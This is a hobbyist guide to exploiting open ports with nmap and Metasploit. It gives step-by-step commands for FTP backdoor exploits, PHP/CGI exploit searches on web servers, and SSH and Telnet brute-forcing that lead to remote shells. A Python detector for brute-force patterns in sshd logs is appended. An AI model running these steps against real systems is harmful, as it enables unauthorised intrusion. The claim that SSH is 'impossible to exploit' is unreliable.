- ==============================================
- open ports guide
- ==============================================
- * Guide written by ZayyN_
- * Discord: ZayyN_#2829
- ----------------------------------------------
- Requirements:
- • Linux - OS (Kali, Parrot)
- • nmap
- • msfconsole
- • A little bit of brain cells
- ----------------------------------------------
- ============================
- About open port exploiting
- ============================
- - The methods that ethical hackers commonly use are very similar and simple...
- - This guide is for educational purposes only !!!
- - Do not use these methods without permission !!!
- - I am not responsible for any of your actions caused by this manual !!!
- Common ports ...
- 80, 88, 443, 21, 22, 23
- ############################################################################################################
- # #
- # • FTP - [21 Default] - Possible to exploit #
- # • SSH - [22 Default] - !! Impossible to exploit !! - Strong security / Brute force is commonly used #
- # • TELNET - [23 Default] - Old - Ez to exploit - Brute force is commonly used #
- # • HTTP - [80, 88 Default] - Possible to exploit #
- # • HTTPS - [443 Default] - Possible to exploit #
- # #
- ############################################################################################################
- ==========================
- NMAP
- ==========================
- Aggressive scan [Universal scan]
- • nmap -A <target>
- Scan open ports ...
- • nmap -sV <target>
- Scan uncommon open ports ...
- • nmap -sV -p- <target>
- ==========================
- ftp metasploit exploit (only old versions)
- ==========================
- 1.) Ping the ftp server to get its ip ...
- • ping <url-ip>
- 2.) Scan open ports with nmap ...
- • nmap -sV <target>
- 3.) Search exploit for current ftp version ... (in terminal)
- • searchsploit <ftp-version>
- 4.) Open msfconsole as root and search ftp version exploit
- • search <ftp-exploit>
- 5.) Then copy the backdoor exploit name and type the following commands
- • use exploit/unix/ftp/<exploit-version>
- • set RHOST <ftp-ip>
- • set RPORT <ftp-port>
- • set payload cmd/unix/interact
- • exploit
- 6.) When u do all the steps correctly the ftp exploit runs ... now the shell will pop up
- ===========================
- http metasploit exploit (only old versions)
- ===========================
- 1.) Ping the server to get its ip ...
- • ping <url-ip>
- 2.) Scan open ports with nmap to get http port... (Default is 80)
- • nmap -sV <target>
- 3.) Open msfconsole as root and search http version exploit
- • search auxiliary/scanner/http/http_version
- 4.) Use the scanner module ....
- • use auxiliary/scanner/http/http_version
- • set RHOST <http-ip>
- • set RPORT <http-port>
- • run
- 5.) Now u can clearly see the http version... So we can exploit it more :P Scan for valid php exploits and run them in msfconsole
- • searchsploit <http-version> | grep php    (in terminal)
- • grep cgi search <php-version>    (in msfconsole)
- • use 1
- • show options
- • set RHOST <http-ip>
- • set RPORT <http-port>
- • run
- 6.) When the correct steps were made... u have full access
- • Try sysinfo to identify the OS of the php
- ===========================
- ssh metasploit bruteforce (all versions)
- ===========================
- 1.) Ping the server to get its ip ...
- • ping <url-ip>
- 2.) Scan open ports with nmap to get ssh port...
- • nmap -sV <target>
- 3.) Open msfconsole as root and search for the ssh login module
- • search auxiliary/scanner/ssh/ssh_login
- 4.) Use the module ....
- • use auxiliary/scanner/ssh/ssh_login
- • set RHOST <ssh-ip>
- • set RPORT <ssh-port>
- • set VERBOSE true
- • set USER_FILE <path>
- • set PASS_FILE <path>
- • set STOP_ON_SUCCESS true
- • run
- 5.) When a correct credential has been found u can open the session ...
- • sessions -i 1
- ==============================
- telnet metasploit bruteforce (all versions)
- ==============================
- 1.) Ping the server to get its ip ...
- • ping <url-ip>
- 2.) Scan open ports with nmap to get port...
- • nmap -sV <target>
- 3.) Open msfconsole as root and use the telnet login module
- • use auxiliary/scanner/telnet/telnet_login
- • set RHOST <target-ip>
- • set RPORT <telnet-port>
- • set VERBOSE true
- • set USER_FILE <path>
- • set PASS_FILE <path>
- • set STOP_ON_SUCCESS true
- • run
- 4.) When a correct credential has been found u can open the session ...
- • sessions -i 1
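
Seen from the server side, the ssh and telnet brute force sections above look like a burst of failed logins from one source, sometimes ending in a success. The following is an added example, not part of the original guide, that flags that pattern in sshd auth-log text; the sample log lines, the threshold of 5 failures in 60 seconds, the fixed year and the name `detect_bruteforce` are assumptions made for the illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample in OpenSSH syslog format (documentation IPs, not a real host).
SAMPLE_LOG = "\n".join(
    [f"Mar 10 12:00:{s:02d} srv sshd[900]: Failed password for {u} "
     f"from 203.0.113.7 port 4{s:04d} ssh2"
     for s, u in enumerate(["root", "admin", "invalid user test", "root", "pi", "root"])]
    + ["Mar 10 12:00:07 srv sshd[900]: Accepted password for root from 203.0.113.7 port 40007 ssh2",
       "Mar 10 12:03:00 srv sshd[901]: Failed password for alice from 198.51.100.4 port 50000 ssh2",
       "Mar 10 12:09:00 srv sshd[902]: Accepted password for alice from 198.51.100.4 port 50001 ssh2"])

EVENT = re.compile(r"^(\w{3}\s+\d+ [\d:]{8}) \S+ sshd\[\d+\]: (Failed|Accepted) password "
                   r"for (?:invalid user )?(\S+) from (\S+) port")

def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60), year=2024):
    """Flag source IPs with >= threshold failed logins inside a sliding window.

    Syslog timestamps carry no year, so `year` is an assumed constant.
    Returns {ip: {"users": set_of_names_tried, "compromised": user_or_None}}.
    """
    recent = defaultdict(deque)  # ip -> failure times still inside the window
    tried = defaultdict(set)     # ip -> every username that failed from it
    alerts = {}
    for line in log_text.splitlines():
        m = EVENT.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m[1]}", "%Y %b %d %H:%M:%S")
        outcome, user, ip = m[2], m[3], m[4]
        q = recent[ip]
        if outcome == "Failed":
            tried[ip].add(user)
            q.append(ts)
            while ts - q[0] > window:
                q.popleft()
            if len(q) >= threshold:
                alerts.setdefault(ip, {"users": tried[ip], "compromised": None})
        elif ip in alerts and q and ts - q[-1] <= window:
            # A success right after a failure burst: the guess worked, escalate.
            alerts[ip]["compromised"] = alerts[ip]["compromised"] or user
    return alerts

if __name__ == "__main__":
    for ip, hit in detect_bruteforce(SAMPLE_LOG).items():
        print(ip, sorted(hit["users"]), "compromised:", hit["compromised"])
```

An alert with `compromised` set means the account's password should be rotated and its session reviewed; key-only authentication and rate limiting on the service remove the pattern at the source.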